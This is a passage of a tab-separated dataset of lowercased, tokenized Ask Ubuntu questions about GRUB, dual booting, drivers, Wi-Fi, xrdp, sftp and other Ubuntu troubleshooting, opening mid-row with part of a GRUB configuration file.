grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' uncomment to enable badram filtering , modify to suit your needs this works with linux ( no patch required ) and with any kernel that obtains the memory map information from grub ( gnu mach , kernel of freebsd ... ) grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' uncomment to disable graphical terminal ( grub-pc only ) grub_terminal=console the resolution used on graphical terminal note that you can use only modes which your graphic card supports via vbe you can see them in real grub with the command `vbeinfo' uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux grub_disable_linux_uuid=true uncomment to disable generation of recovery mode menu entries grub_disable_recovery= '' true '' uncomment to get a beep at grub start grub_init_tune= '' 480 440 1 '' grub_gfxmode=1366x768
379788	xrdp and openbox	i have a problem with my server . it is running on ubuntu 12.04 lts and using xrdp as remote desktop server for other machines . recently i installed openbox wm , i set it in login screen and it works on server . however on remote machines after login it starts gnome+openbox . how to set to login only openbox via xrdp ?
379790	which candidate should be installed for libeigen2 and libconfig++ from repository ?	i need to install libeigen2 and libconfig++ for compilation of a source code but it is lacking . what library cadidates need to be intalled , -dev dbg or such ?
379792	how to install and configure ispunity in ubuntu 13.10 ?	please provide a step by step tutorial on how to configure ispunity to combine internet from multiple sources like connectify dispatcher does on windows .
379794	youtube firefox app	running a brand new installation of ubuntu 13.04 i downloaded today and installed via a live usb . first action was to open firefox . well , no , i closed it because the updater had 100 mb of updates . cool , installed them . restarted . after updating and restarting , my first action was to launch firefox . into the url bar i typed in `` youtube '' + control+enter . from the top of the firefox ui , pops a message telling me `` for the best experience , install the youtube app . '' i installed it . after all , it looked like 'official ' firefox-for-ubuntu software . what the heck does this `` program '' do ? the only effect i see so far is a new icon on my launcher . how can i uninstall this ? i went genocidal and disabled every single one of the four ( ! ! ) ubuntu/unity firefox add-ons , and that fixed it . but what an awful design decision ! what a horrible attempt at a program ! it even shares traits with malware -- there is no listed way to uninstall or remove it . i truly can see how this might be useful for those users who have trouble distinguishing web site-hosted applications and local executables , but i seriously expected more from the combined brainpower of ubuntu and firefox . sheezus .
379797	home server , desktop or server version ?	i 'm going to build myself an ubuntu home server for file storage , video streaming , ftp , etc.. i 'm not really that familiar with ubuntu , or linux for that matter and am wondering if i should install the desktop version or the server version ? what are the pros/cons ? i 've heard somewhere that the version is pretty much the same , just that desktop version contains gui and some other video optimization and software for the regular user . but the fact that i 'm not quite familiar with commands etc , should i take the difficult road and install server edition ? if so , is there any good guides/ebooks about the topic ubuntu server . this is a private server , so only i will have access to it . the whole thing about monitor , i 'm not sure about yet . i 'm thinking about building myself a lackrack from ikea furniture and putting it there with a maintenance monitor-keyboard setup . my main computer is a windows os , so i will use openssh and putty whenever i can . the reason i 'm leaning a bit towards desktop version is that with the gui , it 's probably a bit easier to have control and organization over the system .
379802	pre-install script failed when try to install nvidia driver	i downloaded the latest nvidia-linux-x86_64-310.32.run from nvidia 's web site . then i did the following from a text console as root : stop lightdm bash ./nvidia-linux-x86_64-310.32.run the installation stops , telling me that a pre-install script failed . any help please
379803	how to turn off hard drive when booting from usb ?	i want to install ubuntu on a usb drive and found these instructions here . i want to do this , because i want to use my laptop when i am in a car or when i walk . so , i want to turn off my hard drive when booting from usb to prevent it to cause bad sectors , etc . now my question is : how to manually turn off the hard drive when booting from usb ? or , does it turn off when is n't in use or being mounted ?
379805	i can not format my flash usb stick - newby user	i have the latest edition of ubuntu , formated my pc 1 week ago . i right clicked on the usb flash partition and i sow the format option . it is not grayed out , i do the format , it shows no files when i open the usb file , but when i click on priorities , it shows 94 % full .
379807	uhhuh . nmi received for unknown reason 30 on cpu 0	we have already running virtual servers with ubuntu 12.04.1 lts . also we are using vmware platform . when this error is going through the servers state of suspended in vmware . the case : nov 20 11:06:03 lhasdch02-int kernel : [ 7107336.205700 ] uhhuh . nmi received for unknown reason 30 on cpu 0 . nov 20 11:06:03 lhasdch02-int kernel : [ 7107336.205897 ] do you have a strange power saving mode enabled ? nov 20 11:06:03 lhasdch02-int kernel : [ 7107336.205964 ] dazed and confused , but trying to continue
379809	zte mf180 - bsnl - 3g datacard usb modem not working in ubuntu 12.04 lts	i 'm entirely new to ubuntu and hence do not have much knowledge about it ... i recently installed ubuntu 12.04 lts version alongside with windows 7 since i wanted dual booting option . here 's my problem ... the zte mf180 3g datacard usb modem ( service provider - bsnl ) is working fine in windows 7 without any problems but it is not working in my ubuntu 12.04 lts . to add to this i do not have acces to any wired network for internet ... i want to get rid of windows so as to use only ubuntu but without internet what good would it be right.. ? as i mentioned earlier i 'm new to this os ( i like ubuntu ... it is much better than windows ) and i 'm in desperate need of help ... it would be great if anybody could suggest me clearly how to make my 3g datacard work ... thanks in advance ... ok here is the output of lsusb bus 001 device 002 : id 19d2:0154 zte wcdma technologies msm bus 001 device 003 : id 0c45:62c0 microdia sonix usb 2.0 camera bus 004 device 002 : id 03f0:171d hewlett-packard bluetooth 2.0 interface [ broadcom bcm2045 ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0002 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0002 linux foundation 1.1 root hub
379811	is there a text based mind mapping tool for ubuntu ?	do you know any text based mind mapping tools for ubuntu ? i.e . i would like to edit a text file ( e.g . using vim ) using a certain markup and then be able to convert it to a mind map ( e.g . in png oder pdf format ) . do you know any tool that can do that ?
379812	how to run bash commands in ubuntu 13.10 ?	before in ubuntu 12.04 when i make simple bash commands , it works but in ubuntu 13.10 i can only open it with gedit ! how i can run it by only one click ?
379814	ios application testing tool for ubuntu 12.04 lts	have an ios application for iphone5 and later versions ( developed by another team ) , need a automation testing tool , through that i can test my ios application . i tried monkeytalk that requires source code to be installed inside monkeytalk tool , and went through testflightapp too , it is for app distribution for testing , it did not met my requirement . basic requirement : should be helpful for ui , performance and functionality test . that tool should not need source code of my ios app . trail version must be free . tool should work on ubuntu ( do not have imac ) can anyone help me with this ?
379815	did grep change how it uses regexp ?	i used to run commands like : find /dev | grep sd* to output a list of all the drives attached to my computer . it appears that i now have to add any random character before the star in order to get the same affect as shown below : i tested this on various ubuntu 12.04 servers and got the same effect , so i do not think this is just something random on my desktop . is this a new change , a bug , or has it always been this way and my memory needs replacing ?
379820	failed to build software source code	i have downloaded some software like truecrypt and pygame and a few more . i 'm using qt4 and emacs 23 . when i go to build the software i am getting few errors . what do i need to build these programs to run on this computer ?
379822	waking from suspend error - 13.10	whenever i wake my laptop from suspend ( sleep mode ) , i get this black screen with a long line of error or something on it . it dissapears too fast to read it or take a picture of it tough . each time i suspend again , another line like that is added after that line , so when i have used my laptop for like weeks without doing a restart , the screen gets really cluttered for a bit . what might be the cause of this ? i am using ubuntu 13.10 64bit with 3.12.x kerner .
379825	can i restore applications settings from a back up of ubuntu on a fresh install lubuntu ? ( same machine )	and in general , i 'm wondering if this is possible as i switch between ubuntu derivatives ? ( or even linux distro )
379829	keyboard shortcut for input language change works in only one direction	i use 64-bit ubuntu gnome 13.10 . currently i have 2 input languages : english and russian . when i wanted to switch between them i use standard alt-shift shortcut . when the russian is selected alt-shift works fine , but the switchback is impossible . when i use gui for switching it works fine : i want to make switching in both directions possible using not only gui but keyboard shortcuts too . how can i fix this ?
379831	ubuntu 13.10 slow wireless connection	i 'm having problems with my wireless connection in ubuntu 13.10 , my wireless card is atheros ar5b93 . i 've already applied some fixes like updating backports , disabling ipv6 , removing the power management in the wlan0 but the slow internet still goes on . in my windows 7 os the connection is okay . are there other possible fix for this ? thanks !
379838	active directory real time monitoring tool	is there any tool to be run on ubuntu can monitor active directory 2008 group policies in real time and report changes [ who - when - where ] your reply is highly appreciated
379839	how boot to terminal ubuntu 12.04 macbookpro	i tried to boot into terminal with ctrl+alt+t in my ubuntu 12.04 mbp , but it always boot into gui . how can i fix this ?
379847	is it possible to uninstall the 'programs ' rm , cp and mv from the system ?	i ca n't see how this would be useful , but i 'm really interested . is it possible to uninstall the programs rm , cp and mv ?
379853	virtualhost problem after ispconfig	after installing ispconfig 3 all my virtalhost stopped working . for example i cant access my website www.fjoelnir-band.de it is routing the root path . < virtualhost *:80 > serveradmin admin @ localhost servername fjoelnir-band.de serveralias www.fjoelnir-band.de documentroot /var/www/fjoelnir/ scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > options followsymlinks allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > it was working before . but with www.fjoelnir-band.de forbidden you do n't have permission to access / on this server . apache/2.2.22 ( ubuntu ) server at www.fjoelnir-band.de port 80 any idea ?
379856	strange brasero problem	i was trying to burn a copy of the zorin os iso to a dvd+r in brasero . it started out fine , and then it said `` ejected medium '' and ejected the disc . then it said that an error ocurred . why is this happening ? i 've heard there 's a problem with brasero and sony discs , but i 'm using a memorex one . i 'm kind of a noob to linux , so if you answer , please make it simple .
379866	kde accessible always open and unclosable	since today i have a weird icon in my notifications area , its called kde accessible ... it has a close button but it does n't closes when i press that button . it also has a process but that process is unkillable ... i did n't did any updates or other things , this weird icon showed up today and i ca n't get rid of it ... the symbol is a blue circle with a human inside ( i cant post pictures because i dont have enough rep. ) hope anyone can help me , this thing is annoying
379868	make windows hdd show up in grub	i recently installed windows 7 64 bit on a new hdd i put in my pc . before the installation , since i knew windows installations screw up linux partitions , i disconnected the sata of the hdd containing the linux partitions . after installation , if i connect the linux hdd , it is the first in boot priority , as i want , but when the grub shows up , it does n't show the windows 7 hdd in the boot options . i am currently able to run windows without any problems by accessing the bios bootloader on startup , but using grub is much faster . how do i make windows hdd show up in the grub ?
379869	ubuntu suddenly not activating once a second hard drive has been installed ( windows )	i have a dual core hard drive , which i have installed ubuntu 12.04 ... i also have installed on one partition windows 7.. i work with either ubuntu or window depending on my work.. today i have plugged another hard drive which is also dual core.. on that i installed only purely windows 7.. all was fine.. but when i start my pc , i obtain 3 choices.. windows 7 windows 7 ubuntu.. the first windows 7 is my new hard drive installed.. the second is my old one.. when i choose the ubuntu option , it keeps on loading and never actually start on ubuntu ... it say that installation errors ! ! ! please help.. as all my important project files are in ubuntu am desperate..
379876	boot ubuntu from sd card ( via cell phone ) ?	so , i had thought that i had a flash drive kicking around for when i went to do my installation of linux , but i looked around and could n't find it - so , i was wondering if it would be possible to boot ubuntu by connecting my phone - via usb cable - to my computer , and booting off the sd card.. ?
379877	is there support for encrypting the whole boot/system drive with truecrypt in ubuntu ?	is there ( or is there not ) support for encrypting the whole boot/system drive with truecrypt in ubuntu ?
379879	can apps developed in the ubuntu sdk be ported to android ?	i am getting interested in creating mobile apps and i was wondering , can an app created in the ubuntu sdk be deployed to work on android or even ios ? this is n't a huge deal , as i was using eclipse to learn android , but with the html5 abilities of the ubuntu sdk it would great for developing as it would mean less learning of java for me to start . i read this question : is it possible to deploy an ubuntu sdk app to android ? , but it did n't have any answers . thanks !
379883	ubuntu dual boot with win8	i recently managed to dual boot win8 and ubuntu 13.10 successfully . however after i updated the ubuntu os and restarted the machine , i no longer get the os selection screen when booting . my system boots straight into the win 8 . how can i successfully update my ubuntu and still have my dual boot with win 8 working properly ?
379886	poor wi-fi performance with lenovo yoga 13 in ubuntu 12.10	i 'm getting very poor performance using the driver from this post - lenovo yoga 13 realtek wireless driver i 've cloned the git repository from here - https : //github.com/lwfinger/rtl8723au.git made it , installed it and wireless is working but it 's dog slow ( 1mbps vs 30mbps ) compared to in windows . has anyone else experienced this ? any ideas how to debug the problem ?
379890	dell smart card keyboard - smart card not working	i have installed the drivers supplied with my dell smart card keyboard but cant get the smart card to work . its not recognised .
379891	showing incorrect application menu	the application menu in the top panel , where the close/minimize icons are , are often wrong . for example i use my email software ( lotus notes ) , then i click on chrome in the launcher - which puts chrome in the foreground , however it still shows the application menu from lotus notes . even while i am typing this question it still says `` lotus notes '' . it happens seemingly randomly on several applications . if i double click on the menu ( to make the window smaller ) then re-maximize it , then it goes back to the correct application menu . ubuntu 12.04 lts with unity . new ubuntu user ... edit : i have 2 monitors . i 've just noticed now that only 1 applications menu works correctly at a time . if i get the one on the main screen to look correct ( using double-click steps mentioned above ) , then the menu for the secondary screen will stop working correctly . and vice-versa .
379897	bluetooth issue after 13.10	after upgrading ubuntu 13.04 to 13.10 i can not enable bluetooth ... syslog attached : nov 20 16:51:12 whoopsie [ 1743 ] : last message repeated 3 times nov 20 16:51:12 ahmetylnx-hp kernel : [ 645.252769 ] usb 1-1.1 : new full-speed usb device number 10 using ehci-pci nov 20 16:51:13 ahmetylnx-hp kernel : [ 645.353344 ] usb 1-1.1 : new usb device found , idvendor=03f0 , idproduct=231d nov 20 16:51:13 ahmetylnx-hp kernel : [ 645.353356 ] usb 1-1.1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 nov 20 16:51:13 ahmetylnx-hp kernel : [ 645.353362 ] usb 1-1.1 : product : hp integrated module nov 20 16:51:13 ahmetylnx-hp kernel : [ 645.353368 ] usb 1-1.1 : manufacturer : broadcom corp nov 20 16:51:13 ahmetylnx-hp bluetoothd [ 1650 ] : input-headset driver probe failed for device bc : cf : cc : ae:22:2a nov 20 16:51:13 ahmetylnx-hp bluetoothd [ 1650 ] : unknown command complete for opcode 19 nov 20 16:51:13 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint registered : sender=:1.62 path=/mediaendpoint/hfpag nov 20 16:51:13 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint registered : sender=:1.62 path=/mediaendpoint/hfphs nov 20 16:51:13 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint registered : sender=:1.62 path=/mediaendpoint/a2dpsource nov 20 16:51:13 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint registered : sender=:1.62 path=/mediaendpoint/a2dpsink nov 20 16:51:13 ahmetylnx-hp bluetoothd [ 1650 ] : adapter /org/bluez/1650/hci0 has been enabled nov 20 16:51:13 ahmetylnx-hp bluetoothd [ 1650 ] : adapter /org/bluez/1650/hci0 has been disabled nov 20 16:51:13 ahmetylnx-hp bluetoothd [ 1650 ] : unregister path : /org/bluez/1650/hci0 nov 20 16:51:13 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint unregistered : sender=:1.62 path=/mediaendpoint/a2dpsink nov 20 16:51:13 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint unregistered : sender=:1.62 path=/mediaendpoint/a2dpsource nov 20 16:51:13 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint unregistered : sender=:1.62 path=/mediaendpoint/hfpag nov 20 16:51:13 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint unregistered : sender=:1.62 path=/mediaendpoint/hfphs nov 20 16:51:13 ahmetylnx-hp kernel : [ 645.821633 ] usb 1-1.1 : usb disconnect , device number 10 nov 20 16:51:13 ahmetylnx-hp kernel : [ 646.209581 ] usb 1-1.1 : new full-speed usb device number 11 using ehci-pci nov 20 16:51:13 ahmetylnx-hp kernel : [ 646.306251 ] usb 1-1.1 : new usb device found , idvendor=03f0 , idproduct=231d nov 20 16:51:13 ahmetylnx-hp kernel : [ 646.306261 ] usb 1-1.1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 nov 20 16:51:13 ahmetylnx-hp kernel : [ 646.306265 ] usb 1-1.1 : product : hp integrated module nov 20 16:51:13 ahmetylnx-hp kernel : [ 646.306269 ] usb 1-1.1 : manufacturer : broadcom corp nov 20 16:51:14 ahmetylnx-hp bluetoothd [ 1650 ] : input-headset driver probe failed for device bc : cf : cc : ae:22:2a nov 20 16:51:14 ahmetylnx-hp bluetoothd [ 1650 ] : unknown command complete for opcode 19 nov 20 16:51:14 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint registered : sender=:1.62 path=/mediaendpoint/hfpag nov 20 16:51:14 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint registered : sender=:1.62 path=/mediaendpoint/hfphs nov 20 16:51:14 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint registered : sender=:1.62 path=/mediaendpoint/a2dpsource nov 20 16:51:14 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint registered : sender=:1.62 path=/mediaendpoint/a2dpsink nov 20 16:51:14 ahmetylnx-hp bluetoothd [ 1650 ] : unregister path : /org/bluez/1650/hci0 nov 20 16:51:14 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint unregistered : sender=:1.62 path=/mediaendpoint/a2dpsink nov 20 16:51:14 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint unregistered : sender=:1.62 path=/mediaendpoint/a2dpsource nov 20 16:51:14 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint unregistered : sender=:1.62 path=/mediaendpoint/hfpag nov 20 16:51:14 ahmetylnx-hp bluetoothd [ 1650 ] : endpoint unregistered : sender=:1.62 path=/mediaendpoint/hfphs nov 20 16:51:14 ahmetylnx-hp kernel : [ 646.589750 ] usb 1-1.1 : usb disconnect , device number 11 nov 20 16:51:14 ahmetylnx-hp logger : loading hp device 001 010
379898	how do i delete this file	i installed avast to try to get to the source of ongoing problems and found this 15:14:25 : an error occured in avast ! engine : the file is a decompression bomb 15:14:25 : could n't delete file '/home/simon/desktop/ubuntu /lubuntu-12.04-desktop-powerpc.iso/casper/filesystem.squashfs ' .
379902	juju fails to spawn local lxc containers	the setup is ubuntu 12.04 updated to the 3.8 kernel to be able to use juju locally , container created using bootstrap , but it does not start : jmerelo @ amy : ~ $ sudo lxc-start -n jmerelo-local-machine-1 lxc-start : failed to spawn 'jmerelo-local-machine-1' the only problem in kern.log seems to be this nov 20 16:01:39 localhost kernel : [ 2102.918295 ] device veth7dhiov entered promiscuous mode nov 20 16:01:39 localhost kernel : [ 2102.919082 ] ipv6 : addrconf ( netdev_up ) : veth7dhiov : link is not ready but i 'm not sure it 's related at all , except for the weird bridge name . any idea of where i shoudl look ? or why it does not work ? i have restarted the machine and can confirm i am running in the new kernel .
379903	send an sms message on server crash	is it possible to send a text or sms message to my phone when my server crashes ? i know there are services such as textfree for ipod that allow free texting over wifi but is there anything that can allow a server to do this ?
379906	no hd option on netflix-desktop watch page	using netflix-desktop ( amazing btw ) and tunlr to watch us netflix shows , but the same shows that i can watch in hd on other computers , do n't let me watch them in hd . in fact , i have n't found one shows yet that lets me use hd on netflix-desktop . does anyone else have this problem ? does anyone have a fix ? would be greatly appreciated if someone does have a fix ! !
379913	hackintosh want to delete and install ubuntu via usb	hi want to delete the snow leopard i have installed on my hackintosh and replace with ubuntu via usb as do n't have access to cd drives . please help !
379915	problems booting ubuntu 12.04 on dual boot with windows 8	i recently installed ubuntu 12.04 alongside pre-installed windows 8 . it went successfully for the most part , after turning off secure boot and fast boot . for the past few days i was able to choose either ubuntu or windows from grub no problem . today when i chose ubuntu it just went to a purple screen and stayed there . i had to restart the system twice before it would boot ubuntu . i am new to ubuntu , and partitioning my drive . does anyone know why i might be experiencing a problem booting ubuntu ? here is a screenshot of gpartition . here is my boot-repair summary
379918	how do i fix boot problems after installing 12.04 alongside windows 8 ?	i 'm a long-time windows user trying to convert to ubuntu . i think i messed up the installation pretty badly and i 'm not sure how to fix it . i will try to be as detailed as possible : i recently bought an acer aspire netbook that came pre-loaded with windows 8 . i wanted to have a dual-booting windows 8 and ubuntu set up . i followed these instructions to install ubuntu alongside windows . as per the article , i shrunk the main partition in windows 8 , and downloaded ubuntu 12.04 onto a usb stick . i changed my boot settings to go into legacy mode , so as to turn off secure boot ( i ca n't turn it off in uefi mode ) , and instructed it to boot from the usb stick . opening the live version , i installed ubuntu on manually created partitions , as the installer did n't recognize windows 8 . again following the article 's instructions , i created 2 ext4 partitions and a swap partition using the free space . i got an error saying something about needing a ~1mb partition ( was either for boot or bios , i forget the exact wording ) for ubuntu to run properly . i had 1mb of free space in my list of disk partitions , so i assigned 1mb partition to that and moved along . after fully installing ubuntu , i rebooted and unplugged the usb stick , and the computer directly booted into ubuntu . no big deal , the article said this could happen , and i just needed to tinker with the boot settings . i ran boot repair , and followed the instructions in the boot repair report its instructions . after rebooting , i ca n't access either ubuntu or windows 8 , from legacy mode or uefi mode . i get error : invalid arch independent elf magic . the only thing i can do is load the live version from the usb stick in legacy mode . how i can resolve this issue ? i know that there 's a lot of threads about this error message , but there are so many variables with the installation i have a hard time telling which solutions are applicable , and i do n't want to mess anything up further . please pardon any ignorance , this is my first experience with linux and i feel like i 'm not off to a great start .
379920	problems with network adapter within vm virtualbox	i 'm having trouble with my virtualized machine connecting to my network . here is what i 'm running : host : 12.04.3 lts unity ( connects to internet just fine . vm virtual box v 4.1.12 guest : xubuntu 12.04 everything was running correctly yesterday ( and has been for the past month and a half ) . last night , i left everything running . this morning , i woke up and the network had disconnected and was just cycling trying to connect . steps i took to resolve : tried to boot one of the clones of that machine- same issue deleted the clones , cloned the main image again , booted clone , same issue updated host- same issue updated vm virtualbox - same issue updated one of the clones to 13.10- same issue removed and reinstalled virtualbox- same issue changed the mode for the network on the guest from nat to bridged ( and set adapter to eth ) - same issue changed the adapter in the guest- same issue installed a new vbox with 13.10 for fun and testing- works the virtual box boots and i believe it initially connects to a network successfully . it logs into teamviewer and sync drop box and comes up and tells me i have updates to install . the it starts cycling . while it is cycling , sometimes it will stay stable for a moment and allow me to get to google or something . then it just sits and cycles over and over . i did not change any settings recently other my vpn provider between then and now . and i figured that should n't have an effect since i connect to the vpn on that vmachine manually . but it was on last night connected to that vpn . i just do n't understand what would have caused this . i thank you for your time and feedback . would love to get this solved asap . i 'm open to suggestion . thanks !
379921	how to associate magnet links to qbittorrent ?	i 'm running ubuntu 12.04.03 lts and have installed qbittorrent v2.9.7 via the ubuntu software center . but where can i find this program in the file system . i need that in order to define magnet in firefox edit/preferences/applications .
379923	ip address banned from ubuntuforums ?	i am not a very experienced ubuntu user , so i have to look up some information on the internet . most of the links lead to http : //ubuntuforums.org . but each time i try to open a page on this site , it says `` sorry . the administrator has banned your ip address . to contact the administrator click here '' . that seems strange , because it is the first time i have ever been on ubuntuforums.org . the worst thing is : when i click on the word `` here '' to contact the administrator , it says `` the administrator may have required you to register before you can view this page . '' i tried logging in with sso as it says , but when i open the login page , the message about my ban appears again . i tried to contact the forumcouncil from their page , but it gives me the same error = > i ca n't open it is there any way to find out the reason why my ip was banned ? thank you .
379929	ubuntu does n't find hdds with higher clock rates	i dual boot windows 7 64-bit and ubuntu 13.10 64-bit on separate disks , and utilize some overclocking from the bios . windows works fine , however ubuntu ca n't seem to find any hard drives , except for at stock cpu speeds . while attempting to boot it says gave up waiting for root device ... and alert ! /dev/sdb7 does not exist . dropping to shell ! a bootable usb stick still works , but gparted does n't detect any other drives . have tried : boot-repair changing sata mode in bios newer kernels older ubuntu versions not sure it 's relevant , but the motherboard is a gigabyte ga-a75m-ud2h with the newest bios version , the cpu an amd llano . this is hardly a fatal error , but it 's inconvenient to change bios settings whenever i want to switch os , and furthermore i 'm quite curious about why it wo n't work . i 'd appreciate any insight into what the actual problem is . so how can i resolve this issue ?
379933	ca n't restore skype window	on 13.10 , my skype seem to be properly installed , i have the skype icon in the task bar and it starts automlatically after boot . i normally go into the taskbar icon to open my contact window . this works fine ... . at first ... but after a while this last bit does n't work and there is no way i can restore my contact window ( or do anything else in skype ) . the taskbar icon and menu is still there and is opening fine but none of the menu items are working . i eventually have to kill the process and start skype again to fix that . any idea why that stops working ? thanks .
379935	how to check whether disk is unformatted ?	is there any way to check if a disk is unformatted ? i am using df -lh /dev/sd* and mount to check device filesystem . but i am not sure whether this a good and and only way to check disk on a filesystem . is there any better way to check if disk if raw i.e unformatted ? any help would be highly appreciated .
379941	jack and webcam videorecording	is there any means to record sound and video from the webcam and microphone while jack is operating ? cheese stops recording when i start jack . vlc can output in jack and apparently record sound with jack ( with `` jack audio connection kit '' in `` capture mode '' ) , but i do not know if it can record jack sound and video on the same time ( the `` video for linux 2 '' just suggests the `` hw:0,0 '' option ) . with guvcview i see `` hda intel ... '' , `` pulse '' and `` default '' as options in `` input device '' under audio without jack , but i have had no luck with jack .
379943	what is the .rnd binary in my folder ?	deja dup can not back up a hidden file .rnd located in my home folder . it is a binary file about 1kb in size . when i try to open in a text editor ( gedit ) , i get an error message that there are invalid characters ( utf-8 ) . i know what .gnupg/rnd is , but this is n't .gnupg/rnd it 's just .rnd . also i have n't done anything that i can think of to create a gnupg key , at least not on purpose . anyone know what this baby is ? i backup nightly and this file appeared a couple days ago . i have run update since then . i realize i could delete the file and see what happens , but i 'd rather not go around kicking the tires on my machine if i do n't have to . running ubuntu 13.04 , if that matters .
379944	short life battery	i have a lenovo y480 and , after install ubuntu 12.04 , the life of battery is too short , i mean , when i use the other os , it could be have a life for almost 6 hours , and when i use ubuntu , it have a life no more than 1.5 hours . how can i fix this issue ? thanks ! ! !
379949	why am i unable to update or download software after upgrading to the lts ?	i meet a serious obstacle that stops me from working properly . i ca n't use the update manager , i ca n't download software , i ca n't turn off the computer with the command click on the screen . i did what i saw in the message sent before by others , but no positive results found . this began since when i upgraded from version 10.04 to 12.04 lts . the message received is : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/fr.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-fr % 5ffr , e : les listes de paquets ou le fichier « status » ne peuvent être analysés ou lus . what should i do ?
379953	sftp shows all files and directories for the client	first of all i 'm a total linux rookie . i 've followed some tutorials and got sftp to work . the only thing is , all users can edit/view all files on the linux server . is there some way to only view the /var/www folder for my main account and only the /home/ % u folders to other accounts . this is the edited part on my sshd_config ; subsystem sftp internal-sftp match group sftp chrootdirectory /home/ % u allowtcpforwarding no x11forwarding yes forcecommand internal-sftp
379959	use rsync to change only the date modified of folders/files	i just transferred 1.8tb of data from an external hard drive to an internal hard drive using rsync , but i did n't add the `` -t '' flag , so the `` date modified '' for every file on the internal hard drive is now the date i ran rsync . is there a way to copy the dates from the source files to the destination files without having to delete the destination files and run rsync again with the `` -t '' flag ?
379961	can not install ubuntu on inspiron 1501	i can not install ubuntu on my inspiron 1501 . i have tried different versions of ubuntu and have always ran into a grey screen riddled with colored vertical lines . any help would be much appreciated . i have tried using the nomodeset option to no avail .
379962	wi-fi does n't work , throwing the error `` request or firmware file `iwlwifi-ide` failed ''	after restarting my laptop , this message appears : iwlwifi 00:03:00.0 : request or firmware file `` iwlwifi-ide '' failed no suitable firmware found and i ca n't find wi-fi networks , apparently , my wi-fi card just stopped working . what 's wrong with my wi-fi card ?
379963	intel hd 4600 : no 3d support	i 've got an msi ge-40 laptop with an intel hd 4600 ( integrated in core i7-4702mq cpu ) and geforce gtx760m gpu running ubuntu 13.10 . it looks like 3d is not supported : /usr/lib/nux/unity_support_test -p opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.3 , 256 bits ) opengl version string : 2.1 mesa 9.2.1 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no i 've run glmark2 and it gets a score of 144 . am i right that 3d is not working ( but is being rendered by the cpu instead ) ? what can i do to have the intel gpu support 3d or switch to the nvidia gpu ? thanks in advance . please let me know if you need more information . sudo lshw -c video *-display unclaimed description : 3d controller product : gk106m [ geforce gtx 760m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f6000000-f6ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f7000000-f707ffff *-display unclaimed description : vga compatible controller product : 4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller cap_list configuration : latency=0 resources : memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 )
379964	screensaver started and locked the `` guest account '' and asks for password .	i were logged in as a guest user on ubuntu 12.04 . i left the computer for a while and when i came back the screensaver had started , and locked the computer . now it asks for a password to log in to the guest account . i do n't have to write a password when i logged in as guest . how do i enter my current guest session without restarting the computer ?
379965	lightdm/unity-greeter wallpaper will not set	i am trying to set the wallpaper on my login screen , but i cant seem to get anything to stick . i have used gsettings set com.canonical.unity-greeter background '/path/to/pic.jpg ' as user 'lightdm ' . however , i then get the output ( process:6517 ) : dconf-critical ** : unable to create directory '/run/user/1000/dconf ' : permission denied . dconf will not work properly . any ideas ? thanks
379976	lightdm : hide all usernames	i have tried the solutions pointed here , here and here without success . these solutions were for systems previous to ubuntu 13.10 . i am using kubuntu 13.10 . also , i have checked the log for some information , but nothing .
379977	why is n't python featured ?	the site says python is the preferred language for new ubuntu applications . yet the sdk overview page features qml and html5 and presents apis only in those two languages . where is the python sdk and the python for ubuntu api ?
